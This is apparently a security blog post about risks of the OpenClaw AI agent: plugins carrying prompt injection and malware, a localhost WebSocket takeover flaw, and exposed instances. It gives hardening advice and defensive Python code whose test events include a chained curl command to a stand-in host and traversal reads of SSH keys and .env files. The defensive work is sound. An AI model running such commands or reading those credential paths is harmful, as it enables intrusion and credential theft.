OpenClaw Is Powerful. That's Exactly Why It's Dangerous.
March 2, 2026
If you've been in a room with a CTO or engineering leader in the past few months, you've probably heard the name OpenClaw. It's the open-source AI agent that went from a side project to over 215,000 GitHub stars seemingly overnight. And for good reason — it's genuinely impressive. OpenClaw can execute shell commands, read and write files, browse the web, manage your calendar, send emails, and take autonomous action across your entire digital life.
That's also exactly why it should concern you.
This isn't a scare piece. OpenClaw represents a real leap forward in what AI agents can do. But with that power comes a security profile that most organizations aren't equipped to manage — and the data coming in makes that clear. If your team is running OpenClaw, or if someone in your organization installed it on their own, this is what you need to understand.
What Is OpenClaw, Exactly?
OpenClaw (which has gone through a few name changes — it started as Clawdbot, briefly became Moltbot after a trademark dispute, and landed on OpenClaw) is an open-source AI agent created by developer Peter Steinberger. Unlike a chatbot that just answers questions, OpenClaw is agentic. It doesn't wait for you to do things. It does them.
It can run code on your machine. It can access your files. It can connect to third-party services through a plugin ecosystem called ClawHub. For developers and power users, it's a dream. For security teams, it's a new class of risk they're scrambling to get ahead of.
The Security Picture Right Now
Let's be specific. Here's what the security community has found in just the first few months of 2026:
Malicious Plugins Are Everywhere
Snyk's security researchers audited nearly 4,000 plugins from ClawHub (OpenClaw's plugin marketplace) and found that 36% contained detectable prompt injection. That's not a typo. More than a third. Of those, 1,467 were confirmed to contain malicious payloads, and 91% of the confirmed malicious samples combined prompt injection with traditional malware techniques. If someone on your team installs a ClawHub plugin without vetting it, they may be handing an attacker a direct line into their machine.
The "ClawJacked" Vulnerability
Oasis Security disclosed a vulnerability they named "ClawJacked" that allowed any website to silently take full control of a local OpenClaw agent. No plugins required, no user interaction needed. The attack exploited WebSocket connections to localhost, brute-forcing authentication at hundreds of attempts per second with no throttling or logging. OpenClaw patched this in version 2026.2.26 — but only after it was publicly disclosed.
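The two controls the disclosure says were missing, throttling and logging of authentication attempts on the local control channel, are cheap to add. The class below is an added example written for this post, not OpenClaw code; it assumes a hypothetical local gateway that authenticates each WebSocket client with a shared token and passes the client address, the browser `Origin` header (empty for non-browser clients) and the presented token to the gate. Every attempt is written to an audit trail, repeated failures lock the client out for a fixed period, and connections from unexpected origins are rejected before the token is even compared.

```python
"""Brute-force throttling and audit logging for a local agent control channel.

Added example, not part of OpenClaw. Assumes a hypothetical gateway that calls
AuthGate.attempt() once per connection attempt. All names here are assumptions.
"""
import hmac
import logging
import time
from collections import defaultdict, deque

logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
log = logging.getLogger("agent-gateway-auth")


class AuthGate:
    """Validates a client token, throttles repeated failures, logs every attempt."""

    def __init__(self, expected_token: str, max_failures: int = 5,
                 window_seconds: float = 60.0, lockout_seconds: float = 300.0,
                 allowed_origins: frozenset = frozenset(), clock=time.monotonic):
        self._expected = expected_token.encode()
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self.allowed_origins = allowed_origins
        self._clock = clock                     # injectable for deterministic tests
        self._failures = defaultdict(deque)     # client -> timestamps of recent failures
        self._locked_until = {}                 # client -> monotonic time lockout ends
        self.audit = []                         # in-memory trail; ship to a SIEM in practice

    def _record(self, client: str, origin: str, outcome: str) -> None:
        event = {"ts": self._clock(), "client": client, "origin": origin, "outcome": outcome}
        self.audit.append(event)
        log.info("auth client=%s origin=%s outcome=%s", client, origin, outcome)

    def attempt(self, client: str, origin: str, token: str) -> str:
        """Returns 'ok', 'denied', 'locked' or 'bad_origin'."""
        now = self._clock()
        # A browser-initiated WebSocket carries an Origin header. Anything not on
        # the allowlist is refused outright, so a random web page cannot reach
        # the token check at all.
        if origin and origin not in self.allowed_origins:
            self._record(client, origin, "bad_origin")
            return "bad_origin"
        if now < self._locked_until.get(client, 0.0):
            self._record(client, origin, "locked")
            return "locked"
        if hmac.compare_digest(token.encode(), self._expected):  # constant-time compare
            self._failures.pop(client, None)
            self._record(client, origin, "ok")
            return "ok"
        # Failed: keep only failures inside the sliding window, then decide.
        window = self._failures[client]
        window.append(now)
        while window and now - window[0] > self.window:
            window.popleft()
        if len(window) >= self.max_failures:
            self._locked_until[client] = now + self.lockout
            self._record(client, origin, "locked")
            return "locked"
        self._record(client, origin, "denied")
        return "denied"


def demo() -> dict:
    """Drives the gate with a fake clock so the run is deterministic."""
    t = [0.0]
    gate = AuthGate("correct-horse", max_failures=3, window_seconds=60,
                    lockout_seconds=300,
                    allowed_origins=frozenset({"http://localhost:3000"}),
                    clock=lambda: t[0])
    results = [gate.attempt("127.0.0.1", "http://evil.example", "correct-horse")]
    for _ in range(3):                                   # three bad guesses
        results.append(gate.attempt("127.0.0.1", "", "guess"))
    results.append(gate.attempt("127.0.0.1", "", "correct-horse"))  # still locked
    t[0] = 301.0                                         # lockout has expired
    results.append(gate.attempt("127.0.0.1", "", "correct-horse"))
    return {"results": results, "audit_events": len(gate.audit)}


if __name__ == "__main__":
    print(demo())
```

The third failure inside the window locks the client out, and the lockout holds even when the correct token is then presented, which is what turns "hundreds of attempts per second" into a handful per five minutes. The audit list is what a detection team would query for bursts of `denied` and `locked` outcomes from one client.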
Multiple CVEs, Ranging From Moderate to High
OpenClaw has been assigned seven CVEs so far in 2026, covering remote code execution, command injection, server-side request forgery, authentication bypass, and path traversal. These aren't theoretical risks — they're documented, reproducible vulnerabilities.
135,000+ Instances Exposed to the Internet
SecurityScorecard's scanning found over 135,000 OpenClaw instances exposed to the public internet across 82 countries. These aren't just hobbyist setups. They're showing up in healthcare, finance, government, and insurance environments. Many appear to be running inside corporate networks with no security controls in place.
The Shadow IT Problem
Here's the part that should get your attention if you're a business leader, not a security engineer: one in five organizations has deployed OpenClaw without IT approval. People are downloading it, connecting it to company systems, and running it on machines with access to sensitive data — because it's useful and it's free.
That's not malice. It's enthusiasm. But if a misconfigured OpenClaw instance gets compromised, an attacker doesn't just get access to one person's laptop. They get an AI agent with the permissions that person granted it — file access, shell commands, API keys, email. It becomes a highly capable tool working for the wrong team.
If You're Going to Run It, Run It Right
None of this means OpenClaw is inherently bad. It's a powerful tool, and powerful tools require discipline. If your organization has decided to use OpenClaw — or if you suspect someone already is — here's the security posture that makes it viable:
- Audit your environment now. Scan your network for exposed OpenClaw instances. If they're reachable from the internet, that's an immediate priority. Lock them down behind your firewall and require VPN access.
- Update to the latest version. The ClawJacked vulnerability was patched in version 2026.2.26. If you're running anything older, you're exposed. Make this non-negotiable.
- Vet every plugin before installation. ClawHub is not a curated app store. Treat every plugin as untrusted code until your team has reviewed it. Establish an approved list and enforce it.
- Apply the principle of least privilege. OpenClaw lets users grant sweeping permissions. Don't. Limit file system access, restrict shell command execution, and never store API keys or credentials where the agent can reach them.
- Create an organizational policy. Decide whether OpenClaw is approved, conditionally approved, or prohibited. Then communicate that clearly. The worst outcome is silence — because people will fill that silence by installing it anyway.
- Monitor and log agent activity. If OpenClaw is approved, ensure its actions are logged and auditable. You need visibility into what it's doing, what it's accessing, and what external connections it's making.
- Isolate it. Run OpenClaw in a sandboxed or containerized environment whenever possible. If it gets compromised, containment limits the blast radius.
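The least-privilege and monitoring items above come down to one mechanism: every action the agent proposes is checked against an explicit allowlist, and every decision is logged. The script below is an added example written for this post, not OpenClaw's own code. It assumes a hypothetical agent runtime that emits one JSON event per proposed action (file read, file write, shell command, outbound request) and can be told to allow or deny it; the policy, the forbidden-path globs and the sample events are all constructed for illustration. It goes a little beyond the bullets by normalizing `..` in paths and refusing chained shell commands, the two ways an allowlist is most often bypassed.

```python
"""Allowlist policy gate plus audit log for an agent's proposed actions.

Added example, not part of OpenClaw. Event format, policy keys and sample
events are assumptions constructed for this post.
"""
import fnmatch
import json
import logging
import posixpath
import shlex
from urllib.parse import urlparse

logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
log = logging.getLogger("agent-policy")

# Hypothetical policy: anything not listed here is denied.
POLICY = {
    "fs_read":  ["/home/dev/project/**"],
    "fs_write": ["/home/dev/project/build/**"],
    "shell":    ["git", "npm", "pytest"],         # permitted programs (argv[0])
    "net":      ["api.github.com", "pypi.org"],   # permitted hosts, https only
}
# Credential material the agent must never touch, whatever the allowlist says.
FORBIDDEN_PATH_GLOBS = ["**/.ssh/**", "**/.aws/**", "**/.env", "**/*.pem"]

# Constructed sample events, one JSON object per line, as the runtime would emit.
SAMPLE_EVENTS = [
    '{"action": "fs_read",  "path": "/home/dev/project/src/main.py"}',
    '{"action": "fs_read",  "path": "/home/dev/project/../.ssh/id_rsa"}',
    '{"action": "fs_write", "path": "/home/dev/project/src/main.py"}',
    '{"action": "shell",    "cmd": "git status"}',
    '{"action": "shell",    "cmd": "git status; curl http://198.51.100.7/x"}',
    '{"action": "net",      "url": "https://api.github.com/repos"}',
    '{"action": "net",      "url": "http://198.51.100.7/admin"}',
    '{"action": "fs_read",  "path": "/home/dev/project/.env"}',
    'this line is not JSON',
]


def _matches(path: str, globs) -> bool:
    return any(fnmatch.fnmatchcase(path, g) for g in globs)


def evaluate(event: dict) -> tuple:
    """Returns (decision, reason) for one proposed action. Default is deny."""
    action = event.get("action")
    if action in ("fs_read", "fs_write"):
        # Collapse '..' first so a traversal cannot slip past the globs.
        path = posixpath.normpath(event.get("path", ""))
        if not path.startswith("/"):
            return "deny", "relative path"
        if _matches(path, FORBIDDEN_PATH_GLOBS):
            return "deny", f"forbidden path {path}"
        if _matches(path, POLICY[action]):
            return "allow", "path allowlisted"
        return "deny", f"path not allowlisted for {action}"
    if action == "shell":
        cmd = event.get("cmd", "")
        # A chained or substituted command would defeat the argv[0] check below.
        if any(ch in cmd for ch in ";|&`$<>\n"):
            return "deny", "shell metacharacter"
        try:
            argv = shlex.split(cmd)
        except ValueError:
            return "deny", "unparseable command"
        if argv and posixpath.basename(argv[0]) in POLICY["shell"]:
            return "allow", f"{argv[0]} allowlisted"
        return "deny", "program not allowlisted"
    if action == "net":
        u = urlparse(event.get("url", ""))
        if u.scheme == "https" and u.hostname in POLICY["net"]:
            return "allow", "host allowlisted"
        return "deny", f"host {u.hostname!r} not allowlisted or not https"
    return "deny", f"unknown action {action!r}"


def run_audit(lines) -> list:
    """Evaluates each event line, logs the decision, and returns the records."""
    records = []
    for n, line in enumerate(lines, 1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            event, decision, reason = {"action": "malformed"}, "deny", "unparseable event"
        else:
            decision, reason = evaluate(event)
        rec = {"line": n, "action": event.get("action"), "decision": decision, "reason": reason}
        log.info("line=%d action=%s decision=%s reason=%s", n, rec["action"], decision, reason)
        records.append(rec)
    return records


if __name__ == "__main__":
    for r in run_audit(SAMPLE_EVENTS):
        print(r)
```

Run over the constructed events, the gate allows the in-project read, the `git status` call and the GitHub request, and denies everything else, including the `..` traversal to `~/.ssh` (reported under its normalized path) and the `.env` read. The denial records are the ones worth alerting on; a burst of them from one session is a strong sign that either a plugin or a prompt is steering the agent somewhere it was never meant to go.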
The Bigger Picture
OpenClaw isn't the last AI agent that will present these challenges. It's the first one to go mainstream. The risks it exposes — autonomous execution, plugin supply chain attacks, shadow deployments — are inherent to the agentic AI model. Every organization that plans to use AI agents needs a security framework for them, not just a policy for chatbots.
The question isn't whether your people will want to use tools like OpenClaw. They already do. The question is whether you'll have the structure in place to let them do it safely.
Discipline equals freedom. That's as true in AI security as it is anywhere else.
Jason Oglesby is the founder of Ergon Insights, based in Johnson City, Tennessee. He brings 30+ years of experience in software development and technology leadership. Ergon (ἔργον) — one's proper work, done with excellence.
